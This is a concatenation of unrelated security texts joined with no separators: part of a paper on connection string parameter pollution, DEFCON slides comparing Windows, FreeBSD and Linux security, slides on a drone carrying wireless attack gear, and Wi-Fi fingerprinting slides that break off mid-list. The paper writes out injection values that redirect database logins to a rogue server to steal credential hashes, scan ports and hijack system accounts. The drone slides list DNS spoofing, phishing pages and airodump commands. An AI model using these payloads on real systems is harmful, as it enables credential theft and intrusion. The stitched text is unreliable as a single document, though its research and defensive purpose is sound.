[2] are used to connect applications to database engines. The syntax used on these strings depends on the database engine to be connected to and on the provider or driver used by the programmer to establish the connection. One way or another, the programmer must specify the server and port to connect to, the database name, authentication credentials, and some connection configuration parameters, such as timeout, alternative databases, communication protocol or encryption options. The following example shows a common connection string used to connect to a Microsoft SQL Server database: “Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;” As the example shows, a connection string is a collection of parameters separated by semicolons (;), each parameter being a key-value pair. The attributes used in the example correspond to the ones used in the “.NET Framework Data Provider for SQL Server”, which is chosen by programmers when they use the “SqlConnection” class in their .NET applications. Obviously, it is possible to connect to SQL Server using different providers such as: - “.NET Framework Data Provider for OLE DB” (OleDbConnection) - “.NET Framework Data Provider for ODBC” (OdbcConnection) - “SQL Native Client 9.0 OLE DB provider” The most common and recommended way to connect a .NET based application and a SQL server, is to use the framework default provider, where the connection string syntax is the same regardless the different versions of SQL Server (7, 2000, 2005 and 2008). This is the one used in this article to illustrate the examples. 1.2 Web Application authentication delegation There are two ways of defining an authentication system for a web application: create an own credential system, or delegate it to the database engine. In most cases, the application developer chooses to use only one user to connect to the database. Seen from the database side, this database user represents the entire web application. Using this connection, the web application will make queries to a custom users table where the user credentials for the application are stored. Fig. 1. Common web application authentication architecture The web application is identified by a single database user with access to the entire application content in the database, thus it is impossible to implement a granular permission system in the database over the different object, or to trace the actions of each user in the web application, delegating these tasks to the web application itself. If an attacker is able to abuse some vulnerability in the application to access the database, the whole database will be exposed. This architecture is very common, and can be found in widely used CMS systems such as Joomla, Mambo and many others. Usually, the target of the attacker is to get the application users credentials from the users table in the database. The alternative consists in delegating the authentication to the database engine, so that the connection string does not contain a fixed set of credentials, but will use those entered by the application user and it is the database engine responsibility to check them. Database management applications always use this delegated authentication, so that the user connecting to the application will only be able to access and control those objects and actions for which he has permissions. With this architecture, it is possible to implement a granular permission system and to trace user actions in the database. Database engine Web application Fig. 2. Web application delegated authentication architecture. Both methods offer different advantages and disadvantages, apart from the ones already mentioned, which are outside the scope of this article. The techniques described in this paper will focus on the second environment: web applications with delegated authentication to the database engine. 2 Connection String Injection In a delegated authentication environment connection string injection techniques allow an attacker to inject parameters by appending them with the semicolon (;) character. In an example where the user is asked to enter a username and a password to create a connection string, an attacker can void the encrypting system by entering a password such as "pwd; Encryption=off", resulting in a connection string like: “Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd; Encryption=off” When the connection string is populated, the Encryption value will be added to the previously configured set of parameters. 2.1 Connection String Builder in .NET Aware of this exploitation [3] of the connection strings, Microsoft included the “ConnectionStringBuilder” [4] classes on it's version 2.0 of the Framework. They are meant to create secure connection strings through the base class (DbConnectionStringBuilder) or through the specific classes for the different providers (SqlConnectionStringBuilder, OleDbConnectionStringBuilder, etc…), and they achieve this by allowing just key-value pairs for attributes and by escaping injection attempts. The use of these classes when creating a connection string would prevent the injections. However, not every developer or application uses them. 2.2 Connection String Parameter Pollution Parameter pollution techniques are used to override values on parameters. They are well known in the HTTP [5] environment but they are also applicable to other environments. In this example, parameter pollution techniques can be applied to parameters in the connection string, allowing several attacks. 2.3 Connection String Parameter Pollution (CSPP) Attacks As an example scenario to illustrate these attacks, a web application where a user [User_Value] and a password [Password_Value] are required is served by a Microsoft Internet Information Services web server running on a Microsoft Windows Server. The application user credentials are going to be used to create a connection string to a Microsoft SQL Server database as follows: Data source = SQL2005; initial catalog = db1; integrated security=no; user id=+’User_Value’+; Password=+’Password_Value’+; This connection string shows how the application is connecting to a Microsoft SQL Server database engine. Knowing this, and attacker can perform a Connection String Parameter Pollution Attack. The idea of this attack is to add a parameter to the connection string with the desired value, regardless of if it already was in the string or the value with which was set up. The component used by .NET applications to craft the connection string will use the value of the last occurrence of the parameter in the connection string. If the connection string has two parameters which key is "Data Source", the value used will be the one of the last of the two pairs, which allows the following CSPP attack vectors: 2.3.1 CSPP Attack 1: Hash stealing An attacker can place a Rogue Microsoft SQL Server connected to the Internet with a Microsoft SQL Server credential sniffer listening (In this exsmple CAIN [6] has been used). An attacker would perform a CSPP attack as follows: User_Value: ; Data Source = Rogue_Server Password_Value: ; Integrated Security = true Resulting in the following connecting string: Data source = SQL2005; initial catalog = db1; integrated security=no; user id=;Data Source=Rogue Server; Password=; Integrated Security=true; The "Data Source" and "Integrated Security" parameters are being overridden so that the Microsoft SQL Server native drivers will use the last set of values ignoring the previous ones, and the application will try to connect to Rogue_Server with the Windows credentials it's running on, which can be either a system user or an application pool user. Example 1: ASP.NET Enterprise Manager This tool is an abandoned and unsupported Open Source tool, but still being used by some hosting companies and some organizations to manage Microsoft SQL Server databases via a web interface. The official web site, which used to be aspnetenterprisemanager.com, is today abandoned, but the tool can be obtained from several other web sites like SourceForge [7] or MyOpenSource [8]. This tool is being recommended in a lot of forums as a good ASP.NET alternative to PHPMyAdmin [9], even though the last version was published on the 3rd of January of 2003. Fig. 3. CSPP in ASP.NET Enterprise Manager to steal the account information The results are collected on the rogue server where the database connection sniffer has been installed giving access to the LM Hash of the account. Fig. 4. Hash collected in the rogue server with Cain 2.3.2 CSPP Attack 2: Port scanning One of the valid parameters on a connection string is the port to connect to. An attacker can abuse an application vulnerable to this technique to network scan servers by trying to connect to different ports and see the error messages obtained: User_Value: ; Data Source =Target_Server, Target_Port Password_Value: ; Integrated Security = true This injection attack will result in the following connection string: Data source = SQL2005; initial catalog = db1; integrated security=no; user id=;Data Source=Target Server, Target Port; Password=; Integrated Security=true; This connection string will ignore the first instance of the first "Data Source" parameter and will use the last one, meaning that the web application is going to try to connect to "Target Port" port on the "Target Server" machine. Observing the differences in the returned error messages, a port scan can be performed. Example 2: myLittleAdmin and myLittleBackup The tools myLittleAdmin [10] and myLittleBackup [11] are commercial tools developed by myLittleTools [12]. Both tools are vulnerable to CSPP attacks up to versions myLittleAdmin 3.5 and myLittleBackup 1.6. Fig. 5. A connection can be established through port 80 to www.gooogle.com As shown in Fig. 5, when the port is listening (open) the error message obtained says that no Microsoft SQL Server is listening on it, but a TCP connection was established. Fig. 6. A connection cannot be established through the XX port to www.google.com When the port is closed, a TCP connection could not be completed and the error message is different. Using these error messages a complete TCP port scan can be run against a server. Of course, this technique can also be used to discover internal servers within the DMZ where the web application is hosted. 2.3.3 CSPP Attack 3: Hijacking Web credentials This time the attacker tries to connect to the database by using the web application system account instead of a user provided set of credentials: User_Value: ; Data Source =Target_Server Password_Value: ; Integrated Security = true These injected values will result in the following connection string: Data source = SQL2005; initial catalog = db1; integrated security=no; user id=;Data Source=Target Server, Target Port; Password=; Integrated Security=true; This time is the "integrated security" parameter what is being overwritten with a "True" value. This means that the system will try to connect to the database with the system account which the tool is running with. In this case this is the system account used by the web application in the web server. Example 3: SQL Server Web Data Administrator This tool is a project, originally developed by Microsoft, which was made free as an Open Project. Today, it is still possible to download the last version that Microsoft released on 2004 from Microsoft Servers [13] but the latest one, released on 2007, is hosted in the Codeplex web site [14]. The version hosted in Codeplex is secure to this type of attacks because it is using the ConnectionStringBuilder classes to dynamically construct the connection string. The version published on the Microsoft web site is vulnerable to CSPP attacks. The following screenshots show how it is possible to get access to the system using this type of attack. Fig. 7. Exploiting the credentials at the WEB Data Administrator In Fig. 7, the password value is: “; integrated Security=true”, as described previously. Fig. 8. Console access with the server account The attacker can log into the web application to manage the whole system. As shown in Fig. 9, this is because all users and network services have access to the server. Fig. 9. System account access grant. Example 4: myLittleAdmin and myLittleBackup In mylittleAdmin and myLittlebackup tools, it is possible to check out the connection string used to get the access. Looking at it, the parameter pollution injected in order to obtain access to the system can be clearly seen. Fig. 10. CSPP in myLittleAdmin. Fig. 10 shows how the "Data Source" parameter, after the "User ID" parameter, has been injected with the localhost value. This parameter, "Data Source", is also the first one of the connection string. Their values are different but the one that is being used is the last one, i.e. the injected one. Same happens with the "Integrated Security" parameter that appears initially with the no value but then is overriden by the one injected in the password value with value yes, resulting in a total access to the server with the system account the web application is running as. Fig. 11. Querying the master..sysusers table. Example 5: ASP.NET Enterprise Manager The same attack also works on the latest public version of the ASP.NET Enterprise manager, so, as can be seen in the following login form, an attacker can perform the CSPP injection to get access to the web application. Fig. 12. CSPP in ASP.NET Enterprise Manager login form. And as a result of it, full access can be obtained, just as can be seen in the following screenshot. Fig. 13. Administration console in ASP.NET Enterprise Manager. 3 Conclusions All these examples show the importance of filtering any user input in web applications. Moreover, these examples are a clear proof of the importance of maintaining the software updated. Microsoft released ConnectionStringbuilder in order to avoid these kinds of attacks, but not all projects were updated to use these new and secure components. These techniques also apply to other database engines such as Oracle databases, which allow administrators to set up Integrated security into the database. Besides, in Oracle connection strings it is possible to change the way a user gets connected by forcing the use of a sysdba session. MySQL databases do not allow administrators to configure an Integrated Security authentication process. However, it is still possible to inject code and manipulate connection strings to try to connect against internal servers not exposed to the Internet. In order to avoid these attacks the semicolon character must be filtered out, all the parameters sanitized, and the firewall be hardened in order to filter not only inbound connections but also prevent outbound connections from internal servers that are sending NTLM credentials to the internet. Databases administrator should also apply a hardening process in the database engine to restrict access by a minimum privilege policy. References 1. The Open Web Application Security Project, http://www.owasp.org 2. Connection Strings.com: http://www.connectionstrings.com 3. Ryan, W.: Using the SqlConnectionStringBuilder to guard against Connection String Injection Attacks, http://msmvps.com/blogs/williamryan/archive/2006/01/15/81115.aspx 4. Connection String Builder (ADO.NET), http://msdn.microsoft.com/en-us/library/ms254947.aspx 5. Carettoni L., di Paola S.: HTTP Parameter Pollution, http://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf 6. Cain: http://www.oxid.it/cain.html 7. ASP.NET Enterprise Manager in SourceForge, http://sourceforge.net/projects/asp-ent-man/ 8. ASP.NET Enterprise Manager in MyOpenSource: http://www.myopensource.org/internet/asp.net+enterprise+manager/download-review 9. PHPMyAdmin: http://www.phpmyadmin.net/ 10. myLittleAdmin: http://www.mylittleadmin.com 11. myLittleBackup: http://www.mylittlebackup.com 12. myLittleTools: http://www.mylittletools.net 13. Microsoft SQL Server Web Data Administrator: http://www.microsoft.com/downloads/details.aspx?FamilyID=c039a798-c57a-419e-acbc- 2a332cb7f959&displaylang=en 14. Microsoft SQL Server Web Data Administrator in Codeplex project: http://www.codeplex.com/SqlWebAdmin
D E F C O N 1 3 Windows vs FreeBSD vs Linux Windows vs FreeBSD vs Linux Or: Why Deploying Linux in your Environment is Suicide D E F C O N 1 3 Don’t Believe Anything I Say Don’t Believe Anything I Say • "Do not believe in anything simply because you have heard it. Do not believe in anything simply because it is spoken and rumored by many. Do not believe in anything simply because it is found written in your religious books. Do not believe in anything merely on the authority of your teachers and elders. Do not believe in traditions because they have been handed down for many generations. But after observation and analysis, when you find that anything agrees with reason and is conducive to the good and benefit of one and all, then accept it and live up to it.” - Buddha • Daytime - Security consultant – “Beltway bandit” in Linthicum MD • Night - Founder of the Shmoo Group, Capital Area Wireless Network, periodic author D E F C O N 1 3 For Your Safety and The Safety of Those Around You For Your Safety and The Safety of Those Around You Linux Zealots Linux Zealots Windows / BSD / Others Windows / BSD / Others • This talk may be not much more than flamebait – You may be reminded of a /. Discussion • This talk is meant to be interactive D E F C O N 1 3 Lets Talk about Security Lets Talk about Security • For the feds, “Information Assurance” • Tactical Coding Error vs Design Flaw • Script kiddie vs Dedicated Attacker • Host Hardening vs Long term operational security D E F C O N 1 3 Long term Operational Security Long term Operational Security • Often overlooked aspect of “security” – We are not an end in and of ourselves. – Further, an IDS does not operational security make • Any idiot can be trained to secure a host – Look at all the security books on the shelf – Running a long term secure enterprise is the tough thing D E F C O N 1 3 Enter Rant Mode Enter Rant Mode D E F C O N 1 3 Potter’s Pyramid of IT Security Needs Potter’s Pyramid of IT Security Needs IDS Patch Mgt Op. Procedures Firewalls Auth / Auth Software ACLs Sec Honeypots Sophistication and Operational Cost D E F C O N 1 3 Why Does the Development Method Matter? Why Does the Development Method Matter? • You can certainly do belly button contemplation to say why it does or does not matter – Structured process is the only way to build a secure and scalable system Or – Having many eyeballs and lack of clear direction means the best and most useful stuff is what will get integrated, not all the fluff. – There is no right answer… • Process driven code can suck horribly • There are often not “many eyes” looking at security Corp View OSS View D E F C O N 1 3 But really, is there a difference? But really, is there a difference? • Beyond what the zealots say, and what the media says… Is there a real difference? • Assessing this difference is a real PIA with lots of red herrings • Methods of determining difference – Examine the development processes – Examine the history of security in the architecture • Vulnerability statistics? – Examine the future directions of security – Ideally get statistics from enterprises on how they spend their security budgets and why • I’m not Burton or IDG… So I just asked friends… D E F C O N 1 3 Let’s talk about Vulnerability Statistics Let’s talk about Vulnerability Statistics • Vulnerability stats are (generally) an artifact of tactical coding errors, not bigger problems • “In the last year we cut the number of patches we released from 35 to 12” – Well, if you’re rolling up many vuln fixes to one patch, it doesn’t count – Further, the impact from the vulns may vary as well – Not just an MS problem… MDKSA-2004-037 • Whose code was the vuln in? – Kernel? Integrated Application? Third Party? D E F C O N 1 3 But We’re ahead of ourselves. First, Windows! But We’re ahead of ourselves. First, Windows! • Developed as a complete system – And then some… Applications are tightly integrated with operating system. – Obviously, MS works as one organization, and Office upgrades are aware of Windows upgrades and vice versa Kernel MS Created Core Sys Utils MS Created Applications MS Created D E F C O N 1 3 Windows Release Methodologies Windows Release Methodologies • Publicized well in advance – Much of it is marketing spam, but there is obviously a HUGE developer network that seeds new technology info well in advance of release • MS has a habit of once they’ve dominated a market, they stop dealing with the market – IE is a prime example – This has a negative impact on security • MS will only integrate as much security as the market demands. • The OSS world will continue to integrate security b/c it’s the right thing to do D E F C O N 1 3 Windows Security Roadmap Windows Security Roadmap • Many long term security initiatives • Internal code security programs – Security is woven through their entire development process – Tho with the recent announcement of Land II, they may not quite be there yet • Security functionality roadmap – Including a full MLS compliant OS by 09 • Definitely aware of Security Operations D E F C O N 1 3 FreeBSD FreeBSD • FreeBSD is designed and developed as a complete end to end system – Kernel to userland system utilities • Structured development process – Core team, and accountability for all parts of the core OS • Beyond userland system utilities, thirdparty software is packaged by the FBSD team – Either in binary or source packaging (or both) Kernel FBSD Created Core Sys Utils FBSD Created Applications FBSD packaged D E F C O N 1 3 FreeBSD Release Methodologies FreeBSD Release Methodologies • For Core system, there is a FreeBSD Release Engineering team. • For Third party software, there is also a team dedicated to “produce a high quality package set suitable for official FreeBSD release media.” • More info at http://www.freebsd.org/releng/ D E F C O N 1 3 FreeBSD Security Roadmap FreeBSD Security Roadmap • FreeBSD provides EOL info WELL in advance of EOL occurring to give operators a heads up. • Many integrated security features – Securelevels are a great feature – Expanded ACL control, jails (!chroot) • While not a Roadmap ala Microsoft, still a great start. D E F C O N 1 3 Linux Linux • It’s Bazaar, right? • Linus et al control the kernel • Community creates the rest with some loose coordination • Distros use Duct Tape as a “value add” to put everything together – While they’re all “Linux” they’re basically different OS’s – Aren’t they? Kernel Linus Created Core Sys Utils Community Created / Distro Pkg Applications Community Created / Distro Pkg D E F C O N 1 3 A Choice Slashdot Quote A Choice Slashdot Quote My point with this is that it's not the kernel that's making GNU/Linux systems crawl on o lder hardwar e. It's the newer ver sions of GNOME and KDE. A s long as you aren't running GNOME or KDE, older hardw are work s just fine. My servers chug along just fine , and my 233 MHz laptop with 64 MBs of RAM running Sawfish als o suffices just fine to do v irtually all m y common tasks (except running any Mozilla product :- P ). So, certainly , GNU/Linux ma y need more developers fro m third world nations, a s you put it. Linux, however , does not. • First, why do I care about the bloat of the graphical environment vs the bloat of the kernel? It’s all part of the OS as far as I care • Second, stop with this GNU/Linux vs Linux argument.. D E F C O N 1 3 Linux Kernel Release Methodologies Linux Kernel Release Methodologies • Whenever they feel like it – Whenever they feel like iterating the third digit • Changes with each major release – 2.0 was different than 2.2 than 2.4 than 2.6 • Not necessarily done in conjunction with distros – Distros released at the same time will often use different kernels • Frankly, it’s all at Linus’ and his deputy’s control D E F C O N 1 3 Distro Release Methodologies Distro Release Methodologies • Even tho they’re all “Linux”, they’re like their own OS – So there… • Some are very slow evolutions and rely on uber admins – Debian is the ultimate example • Others attempt to have structure and make things easier on the user – The Old ReadHet, Ubuntu, etc… • However, since they’re really only responsible for the packaging and glue code, they’re at the whim of the community for features, especially security – A distro will not, for instance, write their own firewall code D E F C O N 1 3 Linux Security Roadmap Linux Security Roadmap • Not much out there for “Linux” – There’s barely a kernel roadmap… • RedHat released a security roadmap 2 years ago that basically amounted to “Integrate SELinux into RH distro” – Really, that’s about all I found… Others have insight? • Lots of add-on things (GRSec, etc…) D E F C O N 1 3 Vulnerability Statistics Revisited Vulnerability Statistics Revisited • Very interesting study - “Role Comparison Report - Web Server Role” by Ford, Thompson, and Casteran – Decomposed the vulns in RH Linux ES 3 and Windows 2k3 – Focused largely on installation and ops as they relate to the vulns (we’re looking for the root cause) • Scary statistics (just a sample from the report)… Severity MS Server 2k3 RHEL ES 3 (min) High 33 48 Med 17 60 Days of Risk High 1145 2124 Med 426 4003 D E F C O N 1 3 And now, Patching And now, Patching • Patching is a core Security function, and releasing patches should be a core vendor function • MS used to release patches whenever it “made sense” – Now they’ve gone to monthly roll-up patches – Concerns about losing resolution (aka: making 0day attacks a problem) have not materialized – Certainly simplifies ongoing Ops • Regression testing / QA can be scheduled in advance and patch deployment times are reduced D E F C O N 1 3 Patching on the *NIXs Patching on the *NIXs • FreeBSD Kernel – Patches direct from FBSD developers • Linux Kernel – Patches can be applied from kernel.org code – Patches can be applied from distro code – Which is right? • Third party patches (network stack, KDE, etc) – Patches direct from developer – Patches from distro – Core system utils in FBSD come from FBSD developers – Again, which is right? • *NIX patches easier to understand, easy to mass deploy – More difficult to determine if it’s needed D E F C O N 1 3 Before the Debian Users get out of hand Before the Debian Users get out of hand • From the Deb Project Lead Report: Woody Security Update Challenges and Progress --------------------------------------------- The ARM problems we've had have also affected the timeliness with which we've been able to get security updates out. A security fix to``xfree86``, for example, has been stalled for weeks because no ARM build daemon has been operational to compile it. (See `Debian bug #298939`_ for details.) D E F C O N 1 3 Lets not Forget about SnR Lets not Forget about SnR • So, it’s not just about the architecture • Security admins have to stay up to date – I.e. We can justify why see surf the net all day • The hell that is the Linux Distro security announcements – We whine about the bad SnR on an IDS, why don’t we whine about the SnR on disclosure lists Vuln Disc. Patch Rel. Ubuntu Rel. Mandrake Rel. Red Hat Rel. Debian Rel. OpenLin Rel. FBSD Rel. Bugtraq Mod. Approves . BillyJoe Rel. V u l n e r a b I l I t y T i m e l i n e D E F C O N 1 3 The Future The Future • Linux continues to survive by brute force and a worldwide network of zealots – The Linux zealots make Apple users look tame • MS will continue to push the bounds of security beyond what the stereotypical OSS operating system can do – Especially from an operational security perspective • The BSD’s will continue to be the leaders in the OSS movement wrt operational security D E F C O N 1 3 Questions? Answers? Questions? Answers? • Contact Info – gdead@shmoo.com – potter_bruce@bah.com • Flames – /dev/null • This talk will be available from www.shmoo.com/~gdead soonish • Check out “Mastering FreeBSD and OpenBSD Security” from O’Reilly
R I C K Y H I L L D E F C O N 2 1 8 / 3 / 2 0 1 3 Phantom Network Surveillance UAV / Drone 1 About Me  Security Consultant, D.C. Area  Specialties: Wireless & SCADA Security  US Govt. and Commercial Engagements  Previous DEFCON talks: WarRocketing & WarBallooning, (over Las Vegas ;-)  Hobbies: R/C heli’s, Deep Sea Fishing 2 Outline  Intro - Aerial Wireless Surveillance  Past Attempts: Balloons, Rockets, UAVForge  New Technology: The Phantom Drone  Building the Network Surveillance Drone  Flights & Results  Conclusion 3 What’s this About?  Aerial visual and wireless (802.11) surveillance  Challenge: Personal previous attempts to capture and, more importantly to engage wireless targets from aerial platforms have been problematic:  WarRocketing– limited air time, Warballooning– limited directional control, weak signals  Others:  Blackhat 2011, Tassey & Perkins - WASP wireless spy drone  UAVForge, 2011 - Covert visual surveillance, No Winner 4 But I luv Heli’s & Drones: Why did UAVForge fail?  Factors:  Govt. required Heli operations be conducted beyond line of sight (LoS)  Limited First Person View (FPV) R/C techniques  Autonomous drone operation required, (including obstacle avoidance)  Landings Problematic: Many Crashes – Teams needed better descent & flight attitude indicators 5 UAVForge – Flight Problems 6 UAVForge – Another Flight 7 What’s New Since 2011?  Technology has improved dramatically:  Computers super tiny: Cotton Candy (30 grams)  CC is Bluetooth, HDMI, and 802.11 capable  Wifi Pineapple (Hak5): small + remotely assessable via 3G, 4G  DJI Phantom = the first “consumer quality” drone that is easily flyable by the average person. 8 Meet “THE” DJI Phantom  DJI Innovations introduced the Phantom JAN 2013  It quickly gained a reputation for being the most stable drone platform in the air today  Features:  GPS Auto-Pilot  Auto “Return to Home”  High payload capability: up to 400 grams  Relatively Inexpensive: $679. UAVForge Dones: $2K-9K 9 TechnoLust Overcomes Me: Let’s build this!  I envision 3 uses for Phantom Network Surveillance:  Site Survey – large area / short time  Observation and Communications Capture Platform for incidents such as the recent Boston Marathon Bombing  Covert missions using the “Perch, Listen & Engage” technique from Rooftops or other normally inaccessible locations 10 TechnoLust …  Designed & Built 2 payloads:  Cotton Candy + WiSpy or KillerBee  Flying Pineapple = Hak5 Pineapple + GSM 3G/4G 11 Site Survey Payload  Design Considerations:  Cotton Candy makes a perfect headless computer  Apple Bluetooth KB & Mouse “detach” instantly  ARM processor runs Ubuntu or Android O/S  1.2 GHz ARM Cortex-A9 CPU, 1GB of RAM, image on microSD  Wireless Tools: Kismet, Wispy (spectools) available, or pretty much any USB device, even Killerbee for ZIGBEE 12 WiSpy Flight Results  Lake Neighborhood: (more flights in Progress) 13 WiSpy Flight Results  2.4 Ghz: 14 We found 802.11 sources – What’s next?  The Flying Pineapple: Tools –> Airodump, sslstrip, site survey, etc.  Payload Objectives:  [1] Land on a residential or commercial building, “Perch”  [2] Conduct Op’s  [3] Return Phantom + payload safely to starting point  “Perch, Listen, and Engage” predictably will become an important technique as in the words of DARPA: “The primary (perching) benefit is to increase (surveillance) persistence by reducing mission power demands while providing stable sensor emplacement.” 15 Pineapple Remote Operation  Remote admin. & monitoring via 3G or 4G (a sweet pen-testing drop box)  Utilizes a relay server, ssh proxy (Hawaii)  Autossh keeps the tunnel alive to the Pineapple (Hak5 episode 1112)  Operations team shells into the Drone & utilizes command prompt or GUI. 1200 mAh LiPo life ~=2-3 hours with the T-Mobile Rocket ZTE-MF592 (GSM)  CDMA devices consume 2x power! (not recommended) 16 Pineapple Offensive Ops  Selected Pineapple Capabilities:  OpenWRT running Jasager – >“the yes man”  URL Snarf  DNS Spoofing  New http landing page for phishing, etc.  airodump-ng runs great in-flight! cd /usb/airodump-ng-logs airomon-ng start wlan0 (monitor mode) airodump-ng -w pcap mon0  Demo Pineapple GUI:  http over ssh 17 Network Diagram  Placeholder: Reverse ssh with Hawaii relay diagram shown here.  Update will be posted to DEFCON site. 18 Pineapple Flight Results  Airodump-NG: 19 Pineapple Flight Result2  Airodump-NG: 20 Flight Video  This slide is a placeholder:  Show Phantom Mission Flight Videos here (5 min. MAX)  No text: all live flights from July 2013  Updates will be posted to DEFCON site. 21 How did we compare to UAVForge Team Scores? 22 How did we compare to UAVForge Team Scores? Phantom ~= 35 23 Conclusion / Future Work  Phantom Network Surveillance Drone: successful proof of concept demonstration for “Perch, Listen, and Engage” wireless network surveillance.  Next DARPA Challenge: Full FPV for non-LoS operations Autonomous operation with waypoints, (Naza-M available now.) Descent rate instruments for precision landing Extend 3 Hr. surveillance capability with better power design... Multiple building operations become possible. 24 Legal & Safety Issues  Do NOT attempt to fly a quadcopter as large and expensive as the Phantom without experience! (I highly recommend joining an R/C club or getting a mentor). Start small: the Blade MQX quadcopter is ideal…  Under current FAA rules flying beyond LOS or above 400 ft. AGL is Illegal  Under no circumstances fly within 3 miles of any airport.  Do NOT violate people’s privacy with cameras or other devices. 25 Legal & Safety Issues…  Respect property rights: If your helicopter, drone, or other expensive equipment comes down on someone else’s property (house, roof or land):  Probable Case – you may Never get it back,  Worst Case – you may be arrested for Trespassing  In no way endanger people on the ground – this means flying away from other people and making sure everyone around you is aware of the aerial operation.  For more info. on pending Legislation & Legal Issues, (see bibliography) 26 Bibliography  DARPA UAVForge project site: http://www.uavforge.net/  DJI Innovations, Inc. Phantom: http://www.dji- innovations.com/product/phantom/  Cotton Candy Computer: http://www.fxitech.com/cotton-candy/what-is-it/  WiFi Pineapple (Hak5): “The Hot-Spot Honeypot Pen-Testing Platform”: http://wifipineapple.com/  Congressional Research Service, “Integration of Drones into Domestic Airspace: Selected Legal Issues”, Dolan and Thompson, April 4, 2013 27 Questions?
I Know What You Are By the Smell of Your Wi-Fi Denton Gentry Try It! 1% 10% Poll: Wi-Fi at DEFCON for a demo 89% bad idea. worst idea. what could go wrong? SSID: SmellOfWifiTalk MAC Sublayer Management Entity (MLME) Probe Request: Asks nearby APs to respond. Association Request: join the Wi-Fi network Probe Request Association Request Probe Response Association Response Try It! SSID: SmellOfWifiTalk Signature: Information Elements Tag #0 Tag #1 Tag #33 Tag #36 Tag #48 Tag #70 Tag #45 Tag #191 Tag #221, Vendor OUI 00:17:f2, #10 Tag #221, Vendor OUI 00:10:18, #2 Tag #221, Vendor OUI 00:50:f2, #2 0,1,33,36,48,70,45,191, 221(0017f2,10),221(0010 18,2),221(0050f2,2) Try It! SSID: SmellOfWifiTalk Signature: Capability bitmasks Transmit power HT Capabilities bitmask (802.11n) VHT Capabilities bitmask (802.11ac) Try It! SSID: SmellOfWifiTalk 0,1,33,36,48,70,45,191,221 (0017f2,10),221(001018,2), 221(0050f2,2),txpow:13f9, htcap:006f,vhtcap:0f811032 Distinctiveness Over Time iPhone, 2007 0,1,48,50 iPhone 4s, 2011 0,1,48,50,45,221(001018,2),221(00904c,51),221(0050f2,2), htcap:0100,htagg:19,htmcs:000000ff iPhone 7, 2016 0,1,33,36,48,70,54,45,127,191,199,221(0017f2,10),221(001 018,2),221(0050f2,2),htcap:006f,htagg:17,htmcs:0000ffff, vhtcap:0f811032,vhtrxmcs:0000fffa,vhttxmcs:0000fffa,txpo w:13f9,extcap:000008 Try It! SSID: SmellOfWifiTalk Signatures in their Final Form Xbox One wifi4|probe:0,1,45,50,htcap:058f,htagg:03,htmcs:0000ffff|assoc:0,1,33 ,36,221(0050f2,2),45,htcap:058f,htagg:03,htmcs:0000ffff,txpow:1208 Nest Thermostat v3 wifi4|probe:0,1,45,221(001018,2),221(00904c,51),htcap:0062,htagg:1a,h tmcs:000000ff|assoc:0,1,33,36,48,45,221(001018,2),221(00904c,51),221( 0050f2,2),htcap:0062,htagg:1a,htmcs:000000ff,txpow:0f09 Chromecast v1 wifi4|probe:0,1,3,45,50,htcap:0120,htagg:03,htmcs:00000000|assoc:0,1, 48,50,127,221(0050f2,2),45,htcap:012c,htagg:03,htmcs:000000ff,extcap: 0000000000000140 Try It! SSID: SmellOfWifiTalk Multiple Signatures wifi4|probe:0,1,45,221(0050f2,8),191,127,htcap:01ef,htagg:1f,htmcs:0000ff ff,vhtcap:339071b2,vhtrxmcs:030cfffa,vhttxmcs:030cfffa,extcap:04000000000 0004080|assoc:0,1,48,45,221(0050f2,2),191,127,htcap:01ef,htagg:1f,htmcs:0 000ffff,vhtcap:339071b2,vhtrxmcs:030cfffa,vhttxmcs:030cfffa,extcap:04000a 020100004080 wifi4|probe:0,1,45,221(0050f2,8),191,127,htcap:01ef,htagg:1f,htmcs:0000ff ff,vhtcap:339031b2,vhtrxmcs:030cfffa,vhttxmcs:030cfffa,extcap:04000000000 0004080|assoc:0,1,48,45,221(0050f2,2),191,127,htcap:01ef,htagg:1f,htmcs:0 000ffff,vhtcap:339031b2,vhtrxmcs:030cfffa,vhttxmcs:030cfffa,extcap:04000a 020100004080 Try It! SSID: SmellOfWifiTalk Signature Aliasing Amazon Dash Button wifi4|probe:0,1,50,45,3,221(001018,2),221(00904c,51),htcap:110c,htagg:19,htmcs:000000ff|assoc:0,1,48,50,4 5,221(001018,2),221(00904c,51),221(0050f2,2),htcap:110c,htagg:19,htmcs:000000ff First Alert Thermostat wifi4|probe:0,1,50,45,3,221(001018,2),221(00904c,51),htcap:110c,htagg:19,htmcs:000000ff|assoc:0,1,48,50,4 5,221(001018,2),221(00904c,51),221(0050f2,2),htcap:110c,htagg:19,htmcs:000000ff Nexus 7 (2012 edition) wifi4|probe:0,1,50,45,3,221(001018,2),221(00904c,51),htcap:110c,htagg:19,htmcs:000000ff|assoc:0,1,48,50,4 5,221(001018,2),221(00904c,51),221(0050f2,2),htcap:110c,htagg:19,htmcs:000000ff Roku HD wifi4|probe:0,1,50,45,3,221(001018,2),221(00904c,51),htcap:110c,htagg:19,htmcs:000000ff|assoc:0,1,48,50,4 5,221(001018,2),221(00904c,51),221(0050f2,2),htcap:110c,htagg:19,htmcs:000000ff Withings Scale wifi4|probe:0,1,50,45,3,221(001018,2),221(00904c,51),htcap:110c,htagg:19,htmcs:000000ff|assoc:0,1,48,50,4 5,221(001018,2),221(00904c,51),221(0050f2,2),htcap:110c,htagg:19,htmcs:000000ff Try It! SSID: SmellOfWifiTalk Signature Disambiguation Amazon Dash Button wifi4|probe:0,1,50,45,3,221(001018,2),221(00904c,51),htcap:110c,htagg:19,htmcs:000000ff|assoc:0,1,48,50,4 5,221(001018,2),221(00904c,51),221(0050f2,2),htcap:110c,htagg:19,htmcs:000000ff|oui:amazon First Alert Thermostat wifi4|probe:0,1,50,45,3,221(001018,2),221(00904c,51),htcap:110c,htagg:19,htmcs:000000ff|assoc:0,1,48,50,4 5,221(001018,2),221(00904c,51),221(0050f2,2),htcap:110c,htagg:19,htmcs:000000ff|oui:firstalert Nexus 7 (2012 edition) wifi4|probe:0,1,50,45,3,221(001018,2),221(00904c,51),htcap:110c,htagg:19,htmcs:000000ff|assoc:0,1,48,50,4 5,221(001018,2),221(00904c,51),221(0050f2,2),htcap:110c,htagg:19,htmcs:000000ff|oui:asus Roku HD 